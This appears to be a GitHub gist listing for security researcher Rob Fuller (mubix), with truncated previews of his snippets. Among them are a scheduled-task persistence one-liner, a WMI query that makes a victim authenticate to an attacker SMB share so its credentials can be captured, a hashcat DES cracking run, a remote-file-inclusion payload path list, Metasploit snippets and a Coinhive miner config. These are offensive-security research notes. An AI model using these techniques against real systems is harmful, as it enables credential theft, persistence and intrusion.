Skip to content

Instantly share code, notes, and snippets.

View mubix's full-sized avatar
🎯
Focusing

Rob Fuller mubix

🎯
Focusing
View GitHub Profile
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@mubix
mubix / simple-ui.min.js
Created January 6, 2018 18:03
Coinhive
self.CoinHive = self.CoinHive || {};
self.CoinHive.CONFIG = {
LIB_URL: "https://authedmine.com/lib/",
ASMJS_NAME: "worker-asmjs.min.js",
REQUIRES_AUTH: true,
WEBSOCKET_SHARDS: [
["wss://ws001.authedmine.com/proxy", "wss://ws002.authedmine.com/proxy", "wss://ws003.authedmine.com/proxy", "wss://ws004.authedmine.com/proxy", "wss://ws005.authedmine.com/proxy", "wss://ws006.authedmine.com/proxy", "wss://ws007.authedmine.com/proxy", "wss://ws029.authedmine.com/proxy"],
["wss://ws008.authedmine.com/proxy", "wss://ws009.authedmine.com/proxy", "wss://ws010.authedmine.com/proxy", "wss://ws011.authedmine.com/proxy", "wss://ws012.authedmine.com/proxy", "wss://ws013.authedmine.com/proxy", "wss://ws014.authedmine.com/proxy", "wss://ws030.authedmine.com/proxy"],
["wss://ws015.authedmine.com/proxy", "wss://ws016.authedmine.com/proxy", "wss://ws017.authedmine.com/proxy", "wss://ws018.authedmine.com/proxy", "wss://ws019.authedmine.com/proxy", "wss://ws020.authedmine.com/proxy", "wss://ws
@mubix
mubix / keybase.txt
Created October 3, 2017 16:06
keybase
### Keybase proof
I hereby claim:
* I am mubix on github.
* I am mubix (https://keybase.io/mubix) on keybase.
* I have a public key whose fingerprint is B2B8 E9A7 DD46 5072 8111 7AB0 68B1 8120 B829 7963
To claim this, I am signing this object:
@mubix
mubix / schtaskmod.ps1
Last active July 18, 2019 13:29
Modify Scheduled Task
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }
@mubix
mubix / infosec_newbie.md
Last active April 7, 2024 22:35
How to start in Infosec
@mubix
mubix / handlercheck.rb
Created October 31, 2016 19:32
Reverse HTTPS Handler Checker
#!/usr/bin/env ruby
require 'net/smtp'
def issue_alert
thetimeitfailed = Time.now
message = <<MESSAGE_END
From: HANDLERCHECKIN <root@metasploithandler>
To: Rob Fuller <mubix@hak5.org>
Subject: Handler Checkin
@mubix
mubix / descrack.txt
Created September 3, 2016 19:21
hashcat new DES cracking
hashcat64.exe -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3
- Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU
Session.Name...: hashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Custom.Chars...: -1 charsets/DES_full.charset, -2 Undefined, -3 Undefined, -4 Undefined
Hash.Target....: File (des_test.txt)
Hash.Type......: DES (PT = $salt, key = $pass)
@mubix
mubix / WMIQuery_SMBAuth.ps1
Created December 18, 2015 03:20
Using a WMI Query to be able to capture credentials
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100
Result:
@mubix
mubix / rfi-list.txt
Created October 31, 2015 16:27
RFI List that used to be hosted: http://ha.ckers.org/weird/rfi-locations.dat
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
@mubix
mubix / set_wallpaper.rb
Created August 19, 2015 07:40
Set Wallpaper Metasploit Post Module from Metasploit Minute
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File